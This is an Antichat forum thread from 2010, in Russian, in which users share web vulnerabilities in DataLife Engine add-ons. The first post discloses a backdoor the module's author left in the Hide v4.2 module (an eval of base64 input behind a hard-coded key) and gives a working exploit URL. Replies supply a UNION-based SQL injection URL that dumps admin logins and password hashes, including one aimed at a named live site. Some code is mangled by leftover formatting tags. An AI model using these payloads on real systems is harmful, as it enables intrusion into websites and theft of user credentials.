HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.06.2010, 18:06
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

Модуль Hide v.4.2 для DLE
Описание: выполнение произвольного кода (бекдор оставил автор)
Зависимость: аккаунт юзера
Файл: engine/modules/hide_news.php
Кусок кода:
PHP код:
if(md5(md5($_GET['conf_key'])) == $sets['key']){ eval(base64_decode($_GET['user_id'])); } 
key записывается в конфиге после любого изменения настроек модуля в админке, причем строго указан - d5bb5b454e4310d06746d9325b1c1968

Как осуществить:
http://site.com/?newsid=XXXX&conf_key=fibona4i&user_id=cGhwaW5mbyg pOw==
Где XXX - айди существующей новости, а user_id - забейсенный php код (в данном случае пхпинфо)

DLE forum 2.5 (дырявый, как сито)
Описание: sql-инъекция
Зависимость: -
Файл: engine/forum/sources/showtopic.php
Кусок кода:
PHP код:
if (intval($tid))
$row_topic $db->super_query("SELECT * FROM " PREFIX "_forum_topics WHERE tid = $tid"); 
Как осуществить:
http://site.com/?do=forum&act=topic&tid=1+[SQL]

Последний раз редактировалось Ctacok; 17.06.2010 в 19:00..
 
Ответить с цитированием

  #2  
Старый 17.06.2010, 19:44
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от wildshaman  
DLE forum 2.5 (дырявый, как сито)
Описание: sql-инъекция
Зависимость: -
Файл: engine/forum/sources/showtopic.php
Кусок кода:
PHP код:
if (intval($tid))
$row_topic $db->super_query("SELECT * FROM " PREFIX "_forum_topics WHERE tid = $tid"); 
Как осуществить:
http://site.com/?do=forum&act=topic&tid=1+[SQL]
можно пример?
 
Ответить с цитированием

  #3  
Старый 17.06.2010, 19:51
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
можно пример?
Пример:
Код:
http://site.ru/?do=forum&showtopic=54%2527+union+select+1,2,CONCAT_WS%280x3a,name,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group%20=1+limit+1
Живой пример на сайте:
Код:
http://rtmusic.co.cc/?do=forum&showtopic=1%2527+union+select+1,2,CONCAT_WS%280x3a,name,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group%20=1+limit+1
Логин + хеш можно наблюдать в заголовке <TITLE>

Да, на многих сайтах колонок где больше где меньше, если появляется сообщение:
The used SELECT statements have a different number of columns
Значит надо либо добавлять, либо убавлять циферки.

Последний раз редактировалось Nightmarе; 17.06.2010 в 19:57..
 
Ответить с цитированием

  #4  
Старый 17.06.2010, 20:03
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

У шамана скуля для 2.5 версии. Ты привёл пример на 2.4.

Цитата:
Сообщение от Nightmarе  
Живой пример на сайте:
Код:
http://rtmusic.co.cc/?do=forum&showtopic=1%2527+union+select+1,2,CONCAT_WS%280x3a,name,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group%20=1+limit+1
http://dleshka.org.ru/states/1174-sql-inekciya-v-dle-forum-v24.html

Параметры совсем разные...
 
Ответить с цитированием

  #5  
Старый 17.06.2010, 20:05
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
У шамана скуля для 2.5 версии. Ты привёл пример на 2.4.



http://dleshka.org.ru/states/1174-sql-inekciya-v-dle-forum-v24.html

Параметры совсем разные...
ок, не заметил, жаль. Щас эту попробую.
 
Ответить с цитированием

  #6  
Старый 18.06.2010, 13:26
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

Цитата:
Сообщение от wildshaman  
DLE forum 2.5
(дырявый, как сито)
Описание:
sql-инъекция
Зависимость:
-
Файл:
engine/forum/sources/showtopic.php
Кусок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tid[/COLOR][COLOR="#007700"]))

[/
COLOR][COLOR="#0000BB"]$row_topic[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_forum_topics WHERE tid =[/COLOR][COLOR="#0000BB"]$tid[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Как осуществить:
http://site.com/?do=forum&act=topic&tid=1+[SQL]
Не понятно, как здесь возможна инъекция, если переменная $tid проходит через intval()?
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #7  
Старый 18.06.2010, 13:39
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от RulleR  
Не понятно, как здесь возможна инъекция, если переменная
$tid
проходит через
intval()
?
очевидно, что неправильно интвалят.

Нужно так

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$tid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tid[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
 
Ответить с цитированием

  #8  
Старый 18.06.2010, 13:42
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Цитата:
Сообщение от RulleR  
Не понятно, как здесь возможна инъекция, если переменная
$tid
проходит через
intval()
?
if (intval($tid)) - думаю тут уязвимое место, т.к. не явно интвалица, а проверяется условием, сооветственно такое 1gsdkjgfdsk - прокатит, проверочный код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR][/COLOR
Причем дыра старая и известна уже давно
 
Ответить с цитированием

  #9  
Старый 18.06.2010, 14:00
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

Посмотрел исходники этого скрипта (dle forum 2.5 final nulled by pigini)

/engine/forum/sources/showtopic.php

PHP код:
[COLOR="#000000"]1: [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_forum_topics WHERE tid =[/COLOR][COLOR="#0000BB"]$tid[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#0000BB"]537[/COLOR][COLOR="#007700"]: }

[/
COLOR][COLOR="#0000BB"]538[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
думаю видно, что переменная $tid в любом случае проходит через intval()
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #10  
Старый 18.06.2010, 14:02
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

2 RulleR:

ну запусти проверочный код, поймешь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.